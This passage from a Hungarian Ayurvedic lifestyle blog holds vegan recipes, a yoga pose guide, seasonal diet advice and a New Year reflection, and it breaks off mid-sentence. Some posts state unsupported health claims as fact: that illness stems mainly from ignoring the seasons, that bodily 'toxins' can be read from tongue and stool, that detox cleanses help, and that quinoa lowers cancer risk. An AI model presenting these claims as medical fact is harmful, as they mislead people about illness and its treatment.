Az első nyár hangulatú vasárnap ... sütkérezünk a Kis kevélyen... a nap melege eltávolította a párolgó erdő illatot és az erdőben elmondhatatlan az illatorgia... Mézédes akác és fenyő, mámorító kakukkfű és megannyi csodás virág és gyógynövény Megkezdődött a nyár, a meleg évszak... élvezzétek, gyűjtsétek az élményeket.... amikor egy képet k?szítesz és ott vagy a pillanatban, átéled,érzed az illatokat, a látványt, a madarak énekét, a bőrödön a szellőt és a nap sugarát... akkor a kép visszanézése, fel fogja idézni az érzéseket, tapasztalatokat. Ha csak fotózol, de nem vagy ott a pillanatban, a képek visszanézése nem fog tudni élményeket , illatokat, hangulatokat felidézni , mert nem lesz miből.... Nem a kép készítése a lényeg, hanem az átélt élmeny
A legegyszerűbb chiapuding
Hozzávalók: 4 dl növényi tej (zabtej vagy rizstej) 8 ek. chiamag steviapor /eritrit / agavé szirup Elkészítés: A növényi tejet egy tálba öntjük, beletesszük a chiamagot, ízlés szerint édesítjük. Jól összekeverve egy éjszakára hűtőbe tesszük. Másnap tálakba szedjük a kész „pudingot”. Gyümölcsökkel, gymülcspürével ízesítjük.
ChocoArtz, a vegán és cukormentes kézműves csokoládé
Igaz, elmúlt a húsvét, az édesség-ajándékozás egyik kiemelt időpontja, de csokoládét, valljuk be, eszünk hétköznapokon is; és bizony nagyon nem mindegy, milyet fogyasztunk. Én, főképp, amióta megszülettek a gyermekeink, figyelek arra, hogy cukor-és adalékanyag-mentes legyen (és persze, nem mindegy az sem, milyen cukorpótló van benne) a vásárolt csokoládé vagy pl. ne legyen benne tejtermék, pálmazsír […]
Egészségmegőrzés - miért betegszünk meg
2023. április 8. Élj harmóniában
Van itt minden.... meleg, hideg, eső, hó, napsütés, pára, szél, szárazság... csak győzzük lekövetni a külső körülmények alakulását öltözködésben, táplálkozásban, életmódban. Az ájurvéda szempontjából a betegségeknek legtöbbször 2 fő oka van. Az egyik, hogy nem vesszük figyelembe a külső körülmények alakulását, az évszakok sajátosságait. A régi korok embere mindig a szezonális körülményeknek megfelelően élt. Pl. télen soha nem fogyasztott nyers, hűtő ételeket - mint nyers gyümölcsök, saláták - inkább előnyben részesítette a tartalmas, a testet melegítő ételeket - levesek, kásák, főzelékek. Tavasszal az időjárás nedves, változékony, szeles, hűvös. Amikor valaki tavasszal sok nedvesítő és hűtő ételt fogyaszt sajnos megnöveli a nyálkás megbetegedések kockázatát (nátha, meghűlés, influenza, allergia, etc.) Az előző hírlevélben írtam részletesen arról, hogyan ajánlott tavasszal táplálkozni és milyen életmódbeli ajánlásokat érdemes figyelembe venni. A másik fő oka a betegségeknek, hogy nem vagyunk tudatosak a testünkről. A test jelzi, hogy fáradt, menne pihenni, de a legtöbben inkább még ébren maradnak, hogy megnézzenek egy filmet vagy dolgozzanak. A test jelzi, nincs szüksége ételre, mert nincs éhségérzet, de a legtöbben leülnek enni, mert vacsoraidő van. A test jelzi, hogy kezd valami bújkálni bennünk, pl. picit kapar a torkunk, de a legtöbben nem kezdik erősíteni az immunrendszerüket. A legtöbb betegség nem egyik, pillanatról a másikra, hirtelen alakul ki. Annak, hogy nem vagyunk jól, gyengül az immunrendszerünk, csökken az energiaszintünk, egyre magasabb a toxinok szintje a szervezetünkben, vagy van valamilyen kezdődő problémánk, betegségünk számos előzetes jele van, de a legtöbben nem tudják, nem akarják figyelembe venni. A legtöbb ember nem figyeli meg a teste jelzéseit és ha észre is veszi, nem hallgat a teste jelzéseire. Célszerű gyakorolni, hogy tudatosan légy jelen a testedben. Figyeld meg egy élethelyzet, egy étel vagy éppen egy tevékenység hatását... tudatosítsd mentálisan és fizikálisan mi, hogyan hat rád. Kerülj kapcsolatba a testeddel és tegyél szert önismeretre azáltal, hogy megfigyeled mi jó és mi nem kedvező a számodra. Honnan tudod, hogy egy betegség előkapujában van a szervezeted? Hogyan tudod megfigyelni, hogy magas a salakanyagok, toxinok szintje szervezetedben? - Tudatosítsd a közérzeted... ha gyakran vagy elnehezült, reggel fáradtan ébredsz, kimerültnek érzed magad, kedvetlen vagy, motiválatlan vagy - Figyeld meg az emésztésed... ha van puffadás, gáz, savasodás, böfögés, gyomorégés, székrekedés, hasmenés, görcsök - Nézd meg a nyelved... ha van rajta lepedék - Figyeld meg a székleted... ha nyálkás, ragacsos, rossz szagú, nyomot hagy a wc-n (azaz wc kefét kell használnod) - Figyeld meg a vizeleted... ha büdös, szúrós szagú vagy erősen elszíneződik - Figyeld meg az izzadságod... ha rossz szagú , foltot hagy a ruhán - Tudatosítsd a mentális állapotodat... ha tompa az elméd, gyengült a koncentrációd, úgy érzed nem látsz tisztán, sokat kételkedsz - Figyeld meg az étvágyad és az ételekhez való viszonyodat... ha nincs étvágyad, semminek nem lesz igazán jó íze - Figyeld meg az ízületeidet... ha fájdalmak vannak az ízületekben - Tudatosítsd a testérzeteidet... ha vannak a testben elakadások, dugulások, teltségérzet az arcüregben, belekben - Figyeld meg az immunrendszeredet... ha könnyen elkapsz mindenféle betegséget Ha szeretnél megszabadulni a salakanyagoktól, megelőzni a betegségeket, ha úgy érzed itt az idő egy kis testi, mentális és érzelmi tisztításra csatlakozz a Tavaszi Tisztítás Program-hoz, ahol végigkísérünk egy csodás ájruvédikus tiszításon. https://www.eljharmoniaban.hu/tisztitas szeretettel Kati
Vegán répatorta
2023. április 7. Élj harmóniában
A répatorta nagy népszerűségnek örvend, mert nem csak finom, de egy egészségesebb édesség - lévén az összetevők között reszelt répa, aszalt gyümölcs és valamilyen mag szerepel. Én tönkölybúzaliszttel szoktam készíteni, de helyette használhatsz teljeskiörlésű és finom búzalisztet is. A mandula helyett használhatsz diót is. Vegán réptatorta Hozzávalók 1,5 csésze tejeskiörlésű tönkölybúzaliszt 1,5 csésze tönköly finomliszt 1 csésze teljes értékű nádcukor 1 csg sütőpor 1 tk. szódabikarbóna 1 tk. fahéj 1 tk. kadmamom 1 tk. gyömbérpor 1 tk. örölt szegfűszeg 1 tk. vanília vagy ízlés szerint 1 csipet só 2/3 csésze naprafogóolaj vagy kókuszolaj 1,5 - 2 csésze víz 1 csésze mazsola 20 dkg pucolt sárgarépa 10 dkg mandula Vegyszermentes (bio) alapanyagokat használj:) A répákat reszeld le durvára vagy aprítsd fel apróra. A mandulát is daráld le picit durvábbra. Készíts elő egy tortaformát - kend ki és lisztezd ki vagy tegyél bele sütőpapírt. Keverd össze egy tálba a liszteket, sütőport, szódabikarbónát, fűszereket. Majd add hozzá az olajat és a vizet, keverd el. A vizet fokozatosan add hozzá, figyeld, hogy a tészta ne legyen folyós. Tedd hozzá a sárgarépát, mandulát és a mazsolát. A keveréket öntsd a sütőformába és 180 fokra előmelegített sütőben süsd készre kb. 35-40 perc. Ha kihült tehetsz mázat is a tetejére porcukorból és citromléből. Én nem szoktam, mert csak felesleges cukor:) Ha szeretnél az Egészséges és tudatos táplálkozásról többet tudni, szeretettel várlak Egészséges táplálkozás és főzőtanfolyamomra. https://www.eljharmoniaban.hu/tudatos-taplalkozas Jó étvágyat:) szeretettel Kati
Kakaóbabos, tökmagos gluténmentes muffin
2023. március 20. Élj harmóniában
A muffin formát imádom, bármit le lehet készíteni vele - sósat, édeset, bámilyen variációkat és ideális reggelire, uzsonnára, de vacsorára is. A tavasz párás, nedves, vizes (kapha) minőségének megfelelően, ma egy kesernyés, fanyar, fűszeres muffint készítettem. A tavaszi táplálkozásról részletesen korábbi bejegyzésekeben már írtam itt olvasahtod . A kakaó keserű íze és a csípős, fanyar fűszerek ideálisak tavasszal, mert segítenek csökkenteni a szervezetben a nyálka mennyiségét. Kakaóbabos, tökmagos gluténmentes muffin Hozzávalók 2 csésze hajdinaliszt 1 csg. sütőpor 1 csésze datolyacukor 1/2 csésze tökmag 1/2 csésze kakaóbab 1/2 tk kardamom 1/2 tk fahéj 1/2 tk őrölt gyömbér por 1/3 csésze napraforgóolaj víz Vegyszermentes (bio) alapanyagokat használj! Keverd össze a lisztet, sütőport, cukrot egy tálba. Keverd hozzá az olajat és annyi vizet, hogy lágy muffintésztát kapj. kb. 1,5 csésze víz. Add hozzá a tökmagot és a kakóbabot. Néhány lágy mozdulattal dolgozd össze a tésztát. Mindig leírom a muffin készítés egyik titka, hogy soha ne kevergesd hosszan a száraz összetevőket a nedvesekkel és ne hagyd sokáig állni. A dagold a tésztát a muffin formába - amit előtte papírformával bélelj ki vagy ki is vajazhatod, lisztezhete d. Tedd 180 fokra előmelegített sütőbe és süsd készre (kb. 20-25 p). Ha szeretnél az Egészséges és tudatos táplálkozásról többet tudni, szeretettel várlak Egészséges táplálkozás és főzőtanfolyamomra. https://www.eljharmoniaban.hu/tudatos-taplalkozas Jó étvágyat kívánok:) szeretettel Kati
Tégy a gerinced egészségéért! - Parivrtta Utkatászana (Kifordítot székpóz)
2023. március 16. Élj harmóniában
Az Utkatászana (székpóz) vagy ahogy hívják még akarat ereje póz, egy nehéz jógapóz leírását egy korábbi bejegyzésben megtalálod itt. Ez a kifordított változata egy nehezebb póz és ez is j ól energetizálja a testet, serkenti a szív és a tüdő munkáját. Ez a változat méginkább igénybe veszi a test erejét, az izomzatot és némi hajlékonyságot is megkíván. A póz szuper jól erősíti a tested és mellette egy klassz masszázsban részesíti a belső szerveket, ezáltal serkeinti az emésztést, a máj, a belek, a lép munkáját. Rendszeres gyakorlása fejleszti a belső tartást is, az akaraterőt, kitartást, önkontrollt, önbizalmat. Parivrtta Utkatászana Hogyan végezd el? - Állj meg - Tádászanában (hegytartásban) - lehet csípő széles terpesz a két lábad között. - A két talpadon egyformán oszlasd el a testsúlyt. Majd aktivizáld a lábakat. talpakat told le jól a matracba, húzd fel a térdkalácsokat és legyenek aktívak a combjaid is. - A medencédet tartsd stabilan - aktív a hasizom, farizom. és nyújtóz z hosszan az egész gerinceddel fölfelé. - Tedd imatartásba a két kezed a mellkasod előtt. - Belégzéssel hajlítsd a térdeket és menj mélyebbre, akár addig amíg szinte majdnem vízszintes lesz a a combod a talajjal - a medencédet tartsd stabilan. - A térdek maradjanak a boka fölött - ne engedd kibillenni oldalra és ne engedd, hogy a térded nagyon a bokád elé kerüljön. Próbáldt a testsúlyt egyenletesen elosztani a talpakon. - Kilégzéssel csavard a törzsed jobb oldalra úgy, hogy az kezek maradjanak imapózban a mellkasod előtt. A bal kezed felkarjának alsó részét meg is támaszthatod a jobb combodon. - Fordtísd el a fejed és próbálj az ég felé nézni. - Belégzéssel gyere vissza kálló helyzetbe és végezd el a gyakorlatot a másik oldalra is. Kijövetel a pózból belégzéssel gyere vissza álló helyzetbe és engedd le a karjaidat. A kitartás alatt stabilan tartsd a lábakat és a medencédet - gátizom, hasizom, farizom dolgozzon. Kilégzéssel a külső talpéleket és a nagylábujj tövét told a talajba. Belégzéssel próbálj nyújtózni fejtetővel, sz egycsonttal az ég irányába. A hasadat, derék táji szakaszt, medencédet tartsd végig stabilan. A picit behúzott farokcsontb ól nyújtózz az egész gerincoszloppal folyamatosan. Told egymásba a tenyereket, a lapockáidat simítsd a hátadba és próbáld belégzéssel nyitni a mellkast folyamatosan azáltal, hogy távolítod a két kulcscsontot - úgy dolgozz, ahogy Tádászanában (A tádászanáról itt olvashatsz). Amennyiben gerincsérved van - akár nyaki, akár háti - ne gyakorold ezt a pózt. Akkor se csináld ha belső vérzés, hasűri gyulladásod vagy fekélyed van. Ha boka, térd vagy olyan láb sérülésed van amivel nem jó érzést csinálni, akkor ne gyakorold. Akkor se gyakorold ezt a pózt ha szédülsz, érszűkületed, esetleg érelmeszesedésed van, vagy valami gond van a központi idegrendszereddel. Haladóbb változatban a karokat emelheted a fülek mellé is a magasba. A jógagyakorlatokat először mindig hozzáértő jógaoktatóval sajátítsd el. Ha szeretnél jógában elmélyedni, elsajátítani a pózok helyes kivitelezését, szeretettel várunk Kezdő Jógatanfolyamainkra és személyre szabott, igényeidhez, aktuális állapotodhoz igazított magán órákra. https://www.eljharmoniaban.hu/kezdo-jogatanfolyam J ó gyakorlást kívánok:) szeretettel: Kati
Quinoa joghurttal és gyümölccsel
A quinoa gluténmentes, fehérjében gazdag, és egyike azon kevés növényi tápláléknak, amely mind a 9 esszenciális aminosavat tartalmazza. A quinoa rostokban, magnéziumban, B-vitaminokban, káliumban, kalciumban, vasban, foszforban, E-vitaminban és számos jótékony antioxidánsban is gazdag. Egyes fitoösztrogénekként ismert típusokat a menopauzális tünetek kezelésében tanulmányozták, mivel néha képesek úgy viselkedni a szervezetben, mint az ösztrogének.
Rosttartalmánál fogva könnyen emészthető, eltelít, szinten tartja a vércukorszintet, ezért a quinoa remekül beiktatható a fogyókúrákba.
A quinoa jótékonyan hat a metabolizmusra. Két kísérletet végeztek ezzel kapcsolatban, az egyik ember-, a másik állatkísérlet volt. Az emberkísérlet során bebizonyosodott, hogy a quinoával kiegészített étrend csökkenti a trigliceridszintet, a vércukor- és ezzel párhuzamosan az inzulinszintet is. Az állatkísérlet pedig arra mutatott rá, hogy a fruktózban gazdag étrendben a quinoa a fruktóz majdnem összes negatív hatását eliminálja.
Segít eltávolítani a belekben lerakódott salakanyagokat, miután fellazítja a székletet, hatásos szorulás ellen. Jótékonyan hat a zsír- és szénhidrát anyagcserére, vízben oldódó prebiotikus rostjai táplálékul szolgálnak a bélflóra probiotikus baktériumai számára, így közvetlenül is támogatják a bélflóra egyensúlyának fenntartását. A quinoábam lévő kvercetin képes közömbösíteni a káros szabadgyököket, ezért a quinoa megvéd a gyulladásoktól, a szív-és érrendszeri elváltozásoktól, csökkenti a rák kockázatát, illetve sejtmegújító hatású.
Bármit is készítünk ezekből a gabonafélékből, először alaposan öblítsük le őket folyó víz alatt. Ez eltávolítja a szemek porát, és a kása főzése után esetlegesen fellépő keserűséget is.
A recept
Hozzávalók:
- 20 dkg quinoa
- 5 dl víz vagy növényi tej (nekem szójatej volt otthon)
- 1 bögre eper (akár fagyasztott is lehet)
- 1 bögre áfonya (gyümölcsök szabadon variálhatók)
- 1-2 dl növényi joghurt
Elkészítés:
A quinoát vastag szűrőn keresztül átmossuk, majd annyi vízben vagy tejben, ami jól ellepi, puhára főzzük. Ha elfőtt róla az összes folyadék, még adhatunk hozzá. Ha édesen szeretnénk, édesíthetjük banánnal, de ez el is maradhat. Tálaláskor tányérra terítjük, megkenjük joghurttal majd a tetejére tesszük a gyümölcsszemeket. Nem nehéz Alaposan rágva érdemes fogyasztani akkor is, ha könnyen rágható.
Kitchari recept tisztító kúrához
2023. február 14. Élj harmóniában
A kitchari vagy kitcsari egy indiai gyógyító egytálétel, ami nélkülözhetetlen része az ájurvédikus tisztító kúráknak. Szuper egészséges, tápláló étel, amit gyenge emésztés, betegségek esetén is nyugodtan lehet fogyasztani. Korábban egy másik kitchari receptnél írtam részeltesen a kitchariról és hatásairól itt olvashatod Hozzávalok 1 csésze baszmati rizs 1 csésze mungó bab (sárga felezett) kb. 7 csésze víz 1/4 tk só 2 tk ghí 1 tk fekete mustármag 1 tk római kömény (egész vagy őrölt) 1 tk kurkuma 1 tk őrölt koriander 1 tk őrölt édeskömény csipet hing Mosd meg külön a mungó babot és a rizst is. Hevítsd fel a ghít egy edényben, majd tedd bele a fekete mustármagot - a legjobb ha letakarod, mert amikor kipattog, akkor kiugrálhat az edényedből. Húzd le a tűzről picit az edényt amíg pattog a mustármag, majd add hozzá a többi fűszert és keverd el, hogy picit piruljanak. Add hozzá a mungó babot és a sót, pirítsd 1-2 percig. Add hozzá a forró vizet, forrald fel, majd főzd 30 percig. Add hozzá a rizst és ha szeretnél zöldséget is. Keverd össze és adj hozzá még vizet ha szükséges. Forrald fel és főzd takarékon 20 percig vagy amíg a rizs meg nem fő. Ha kész akkor még ízlés szerint sózhatod. A tetejére tehetsz friss koriander levelet és citrommal, sóval és egy szelet gyömbérrel kínálhatod - utóbbiak jól segítik az emésztést. Jó étvágyat kívánok :) szeretettel Kati
Ájurvédikus tanácsok januárra
2023. január 22. Élj harmóniában
A január mindig az év legnehezebben tolerálható, leghidegebb és legdepressziósabb hónapja... Már jó ideje ki vagyunk téve a hidegnek, a fagyos szélnek, a fagyos éjszakáknak, sokat fázunk, rossz a keringésünk, sokaknál gyakori a libabőr, a fagyott kezek lábak és a csontig hatoló hideg érzése... a január szokott lenni az év leghidegebb hónapja. Már hónapok óta nagyon kevés a napsütéses órák száma, reggel és este is sötét van és sokszor több napig vastag felhőréteg takarja el előlünk a napot és a csodás kék eget. Januárra lecsökken a szervezet energiaszintje, nem csak a kevés napsütés és rossz keringés miatt érezzük magunkat nehézkesnek, de nem annyira jutottunk hozzá a szervezeted friss, életenergiában gazdag ételekhez. Mentálisan is kihívás a január, mert nagyon nagy a konktraszt az év végéhez képest. Decemberben fények, csillogás, ünneplés, ajándékok, találkák, rendezvények, szabadság, pénzköltés... majd januárban a szürke dolgos hétköznapok, már nincs olyan sok vendégeskedés és sokan szembesülnek vele, hogy túlköltekeztek karácsonyra. A tél folyamán szükséges szigetelő zsírréteg felépítéséhez eddig nehéz, tartalmas ételekre volt szükséged, de januárra a szervezeted elérni az ideális testsúlyát. A hideg elleni védekezéshez szükséges tartalmasabb ételek megterhelik a szervezeted és a felhalmozódott méreganyag további lomhaságot, testi és szellemi tunyaságot, motíválatlanságot ereményezhetnek. A január arra sarkalja az embereket, hogy otthon bekuckózzanak. Ezt van aki nagyon jól tolerálja és jól ki tudja használni, de sokan kiborulnak, depisek lesznek, sivárnak érzik az életüket. Nézz szét, ilyenkor a természetben is minden visszavonultan, inaktív állapotban pihen, megfagy és a tájat egyfajta békés, végtelennek tűnő csend járja át. Próbáld elfogadni, hogy mindennek meg van az ideje. A modernkori emberek nem szívesen veszik tudomásul, hogy együtt létezzenek a természettel. Sokan egész évben ugynazt az életvitelt szeretnék csinálni, állandóan pörögnek, mindenféle programokat csinálnak, ugyanazon ételeket eszik nyáron és télen is. A január az év végi pörgés után kiváló pihenésre, elcsendesedésre, belső elmélkedésre, lelki gyakorlatokra, újragondolni az élettünket, egészségei állapotunkat, céljainkat, vágyainkat, emberi kapcsolatainkat. Januárban élvezheted a a végtelen csendet, belső békét, tervezheted a jövőd, tanulhatsz, fejlődhetsz, új szokásokat vezethetsz be az életedbe. Itt az idő, hogy többet foglalkozzunk belső világunkkal és kicsit visszavonuljunk a külső világtól. Az életed átgondolásához és a tudatos tervezéshez egy korábbi blogbejegyzésben már sok támpontot adtam itt olvashatod. Néhány plusz tipp hideg téli napokra, amikor sok időt töltesz a lakásban az alábbi bejegyzésben olvasható. Szóval ne lepődj meg ha kicsit kedvetlennek, reménytelennek, lomhának érzed magad, ez januárban teljesen természetes. Kis kitartás, még néhány hét és jön a tavasz ígérete, majd 2 hónap és itt a tavasz, a megújulás ideje. Ajurvédikus szempontból testileg is komoly változásokon megyünk át. Talán Te is észrevetted, hogy januárra a hideg miatt a bőröd, sápadt, száraz, ráncos, esetleg a hajad fénytelen, töredezett lesz. Sokan a tél miatt úgy érzik, hogy éveket öregedett a testük. Míg a telet eddig a hideg és szárazság jellemezte (Vata) szépen lassan haladunk át a hideg és nedves minőségek felé (Kapha). Ez a változás szükésgessé teszi, hogy míg eddig fontos volt a hideg száraz ellen védekezni a meleg, zsíros, tápláló ételekkel, most ezen érdemes alaktodnak megfelelően változtatni. Vata A Vata személyek a sok hideg hatására kibillennek az eggyensúlyuból és hajlamos ak idegességre, hiperaktivitásra, feszültségre, szorongásra. A Vata alkatúak januárban fontos, hogy melegen tartsák magukat, öltözzenek melegen, rétegesen, mert nagyon hajlamosak csontig átfázni. A pihenés is kiemelten fontos a Vata alkatúaknak, mert hajlamosak kimerültségre. Nekik ideális nagyokat aludni, akár délután ledőlni kicsit . Vataknak ahhoz, hogy egyensúlyban tartsák magukat jótékony ha rendszeres szokásokat tartanak fenn. Táplálkozásban annak érdekében, hogy a Vata-k védjék magukat a hidegtől és szárazságtól hasznos, ha tartalmas, melegítő ételeket esznek. Pitta A Pitta alkatú emberek kifejezetten élvezik a kellemes, hideg téli időjárást. Szívesen sétálnak a szabadban, kirándulnak a hóban. A rendszeres szokások fenntartása és a tartalmasabb ételek fogyasztása nekik is fontos. Kapha A Kapha könnyen lehangolttá, lomhává válik és elnehezültnek érezehti magát januárban. Hajlamos lesz megfázni, nyálka felhalmozódásra is. Nekik nem jó a sok pihenés, kerülni kell a túlalvást, mert fokozza a tunyaságot a testben és elmében. Hasznos ha korán kelnek és mozognak reggeli előtt, jóga, thai chi, séta, torna. A kapháknak kell a legnagyobb változást létrehozni a táplálkozásukban, mert a téli nehezebb ételek megterhelték a szervezetüket és pangáshoz vezethetnek. A kaphának könnyedebb , de melegítő hatású étrendre van szüksége. Napi rutin januárban Igazítsd a természet rendjéhez a napi rutinodat is. Januárban fontos, hogy engedd meg a szerveztednek a pihenést, visszahúzódást. Este próbálj 22:00 ig lefeküdni. Reggel ideális a nappal kelni ( 7:20 körül) , ha megteheted akkor ne kényszerítsd magad korábbi ébredésre. Ébredést után tisztítsd meg a nyelved a felhalmozódott lepedéktől, a szájüreget is a salakanyagoktól. Erről korábbi bejegyzésben részeltesebben írtam, itt olvashatod. Fogyassz meleg italt - ez lehet valami fűszeres tea (pl. gyömbér-kurkuma) is egy kis ctromlével, mézzel. Végezz naponta önmasszázst, amely rugalmassá teszi a bőrödet és segít a hideg ellen védeni a tested. Erről itt olvashatsz. A légzésed javítására használj nasya orrolajat és akár napközben alkatodnak megfelelő illoolajokat. Ha Vata alaktú vagy lehet, hogy szükséges a fűtés okozta szárazság ellensúlyozására párologtatni a lakásban. A reggel tisztálkodás után végezz el néhány könnyed jógagyakorlatot és légzőgyakorlatot. Segít beindítani a vérkeringésedet. A reggelit 8 óráig próbáld elfogyasztani, ne nagyon reggeliz később, mert az egyfajta hízókúra lesz. Az ebéd ideális időpontja 12:00 körül van - legkésőbb 13:30ig próbálj megebédelni. Ilyenkor a legerősebb az emésztésed ereje. A délután 15:00-kor elfogyasztott ebédet nem tudja jól feldolgozni a szervezeted. A vacsorát lehetőleg naplementéig fogyaszd el (16:30 körül). Táplálkozás januárban A táplálkozásban is tartsd szem előtt a melegítést. Kerüld a nyers zöldségeket, gyümölcsöket mert ezek nagyon kihűtik a szervezetedet - nem véletlen, hogy hagyományosan januárban ezen az éghajlaton nem terem friss gyümölcs és saláta sem és nem visonylag kevés tejtermé van. Ideális alternatíva ilyenkor az aszalt gyümölcsök fogyasztása és fermentált termékek (savanyú káposzta, vegyes savanyúság, ecetes cékla, etc. .) Lehet észrevetted, hogy januárban már nem kívánod annyira a zsíros, édes ételeket - mint fent írtam, ilyenkorra a szervezeted elérte a kis szigetelő zsírréteg növesztését és nincs szüksége további zsírrétegre:) Hallgass a tested jelzéseire, figyeld meg mit kívánsz vagy mit nem kívánsz. Januárban lehet a keserű íz iránti vágyad megnő vagy éppen a savanyút is jobban kívánhatod. Részesítsd előnyben a meleg, főtt táplálékokat. Ne kezdj még böjtölni, nyers dolgokat fogyasztani, mert a kinti hideg ellensúlyozására szükséged van még melegítő ételekre. Ha Kapha alkatú vagy, fogyni szeretnél válassz könnyű ételeket. Rászesítsd előnyben a csípős, keserű, fanyar ételeket. Használj édesítésre mézet - csak ne melegítsd - mert a méz segít fűteni és szárítani a szervezeted, jól beilleszthető fogyókúrákba is és hasznos nyálkás megbetegedésekrnél. Ha érzed nem kívánod a tartalmas nehéz ételeket, kerüld a tejtermékeket, kenyérféléket és édességeket és részesítsd előnyben a leveseket, gabonaételeket (köles, hajdina, quinoa, kukoricadara) zöldségekkel (cékla, répa, egyéb gyökérzöldségek, zeller, káposzta, brokkoli, karfiol) esetleg hüvelyesekkel. Használj egy kis citromlevet az étkezésekhez. Míg a december sztrája volt a zsíros magokbók készült sütemény, most mérsékeld a diót és minden más zsíros magot. Ha szeretnél valami magfélét, akkor piríts tökmagot. Használj bátran fűszereket, mert segítenek jó hangulatot, jó közérzetet biztosítani, fokozzák a keringésed, melegítik a tested, javítják az emésztésed. Gyömbér, fekete bors, hosszú bors, kurkuma, kardamom, babérlevél, édeskömény, római kömény, fahéj. asafoetida (hing), lepkeszegmag (görögszéna). Mielőtt kilépsz a hidegbe ne egyél túl csípőset, mert csökkentik a hideggel szembeni ellenállóképességed. A reggeli és a vacsora legyen könnyen emészthető, meleg , enyhén fűszeres. A január ideális a sütőben készült ételek előnyben részesítésére is. Szeretek ilyenkor tepsis zöldségeket, muffinokat, süteményeket, zöldséges lepényeket készíteni. A blogon nagyon sok recepet találsz. Ki ne emlékezne gyermekkorából a sütőben sült krumpli sóval vajjal téli vacsorákra:) A sütőben sült cékla és burgonya minimális energiabefektetést igényel:) . Reggelire ehetsz kásákat, muffinokat. Egy kis édes és fűszeres, de nem túl nehezen emészthető étel kellemesen indítja a napodat. Ha Vata vagy Pitta alkatú vagy készítheted a kását tejjel és fűszerekkel is. Ideális a fahéj, kardamom, esetleg egy kis gyömbér az édes muffinokhoz, kásákhoz, mert segít elelnsúlyozoni a nyálkásító hatást. Ebédre valamilyen gabona, zöldség, hüvelyes kombinációt fogyassz. Ha Vata vagy Pitta alkatú vagy, tehetsz a főzéshez egy kis tejterméket pl. tejszínt, tejfölt. Szuperek a levesek is. A vöröslencséből vagy mungdhalból a dhálok (levesek) gyorsan elkészülnek. Vacsorára fontos a könynen emészthetőség és nagyon ideálisak a gabona ételek és zöldségek. Tisztítás Az ünneplések és tartalmas étekezések miatt felgyűlt salakanyagokat január vége, február elején hasznos a szervezetedből eltávolítani. Ideális lehet egy 3-5 napos ájurvédikus tisztító kúra - kitchari, forralt víz amit esetleg kiegészítesz gyógynövényekkel. Ha a tisztításban vagy életmódváltásban, egészségmegőrzésben segítséget szeretnél szeretettel várlak ájurvédikus életmód tanácsadásra, egyéni konzultációra. www.eljharmoniaban.hu Ha úgy érzed, Te is szeretnéd megszabadítani a tested a felgyűlt salakanyagoktól csatlakozz az általam vezetett otthoni online ájurvédikus tisztítás programhoz.. Ezen a csodás tisztításon napról, napra adok neked részeltes információt mit, hogyan csinálj és bármikor kérdezhetsz is tőlem. részletes információk és jelentkezés https://www.eljharmoniaban.hu/tisztitas Ha szeretnél az Egészséges és tudatos táplálkozásról többet tudni, szeretettel várlak Egészséges táplálkozás és főzőtanfolyamomra. https://www.eljharmoniaban.hu/tudatos-taplalkozas Jó egészséget, hasznos belső elmélkedést és kitartást kívánok a januárhoz... nemsokra itt a tavasz :) szeretettel: KAti
Így kezdj neki az új évnek - 2023.
2022. december 31. Élj harmóniában
Már csak egy kis idő választ el a 2023-as év kezdetétől és iylenkor érdemes átgondolni az eltelt évet és január elején pedig érdemes tudatosan tervezni a következő időszakot. Ilyenkor hasznos ha megpróbálod tudatosan elengedni ami volt és tudatosan felkészülni a következő évre. Próbáld mindenben a jót látni. Ahhoz, hogy a következő éved sikeres legyen az első lépés a tudatos tervezés. Önmagában a nagy fogadalmak, nem segítenek minket hozzá egy boldogabb, kiegyensúlyozottabb élethez. A siker titka, hogy belső világunkat rendezzük. Húzz egy vonalat képzeltedben és szemléld végig, milyen is volt az eltelt éved. Majd az előző év tapasztalataiból kiindulva, lehetőséged van arra, hogy átgondold mit szeretnél másképpen csinálni a következő évben. Ebben a bejegyzésben ehhez minden támogatást megpróbálok megadni Neked. Talán az elmúlt évek segítettek a társadalom tagjainak áthelyezni a fókuszpontokat, az anyagi javak halmozása felől az egészség és az emberi kapcsolatok irányba. Az első amit egy év végén át szoktam gondolni kinek vagy éppen miért vagyok hálás az eltelt évben. A Hála lista készítéséről az alábbi bejegyzésben olvashatsz: https://eljharmoniaban.blogspot.com/2019/01/hala-koszonet.html A sikeres változtatáshoz, nagyon fontos, hogy komolyan határozd el pontosan miben szeretnél változtatni és légy tudatos arról, hogyan érheted el. Ne csak azt gondold, "majd rendszeresen mozgok" vagy "majd nem idegeskedem annyit " vagy "többet találkozom szeretteimmel" mert eltelik 2023 és újra azt fogod gondolni, na majd jövőre... Bármi amiben az életben siekres szeretnél lenni, eredméynt szeretnél elérni arra időt, energiát, pénzt kell szánni... Ha nem csinálsz, időt, teret annak amit szeretnél, hogy az életedben megnyilvánuljon, soha nem fog megérkezni A másik pont, amin el lehet bukni, hogy egyszerre túl sok célt tűzől ki magad elé. Ne akarj egy év alatt mindent teljesen megváltoztatni, nézd meg mely célok, változások reálisak az egy éves távlatra. Az elmúlt időszak átgondolásánál talán segít, ha szem előtt tartod, hogy bármi is történt Veled, az mindig érted van és a fejlődésedet szolgálja. Még akkor is ha az adott pillanatban úgy tűnik, hogy ez nem lesz a hasznodra és inkább érzed kényelmetlennek, kellemetlennek, mint jótékonynak. Néha az életünk leginkább rémes helyzeteinek, személyeinek köszönhetjük, hogy türelmet, alázatot, egyszerűséget, önzetlenséget, lemondást vagy éppen elengedést tanulhatunk. Sokszor ha visszatekintünk az életünkre rájövünk, milyen hálásak lehetünk egy-egy olyan életeseménynek, amit, akkor nagyon rossznak éltünk meg. Egy korábbi bejegyzésben erről olvashatsz: Sosem látod a teljes képet... Nem csak az év vége, hanem minden egyes napod új lehetőségeket, új tapasztalatokat hoz számodra. Járj mindig nyitott szemmel, figyeld mit hoz az élet, figyeld merre mennek a sínek. A nyitottság és az elfogadás, a rugalmasság fogja számodra biztosítani, hogy a következő éved igazán sikeres legyen... Mit jelent, hogy sikeres? Talán azt gondolod, hogy most a szokásos dolgokat fogom ideírni... jó állás van, jó fizetés, autó, elismerés, hírnév, tisztelet, valamiben jónak lenni, tehetség.... Sikeres az, aki boldog, elégedett önmagában, kiegyensúlyozott, egészséges, tökéletes harmóniában él önmagával és környezetével - a jóga a sikert az önmegvalósítás elérésével definiálja. Ha úgy érzed a mostani életed, a fentiek alapján nem annyira sikeres, akkor tegyél érte, hogy a következő évben, Te is boldog és kiegyensúlyozott legyél. Lásd a változás szükségességét, mert ha ugyanazt csinálod mint eddig, akkor sajnos ugyanazt az eredményt fogod kapni. A változás amit 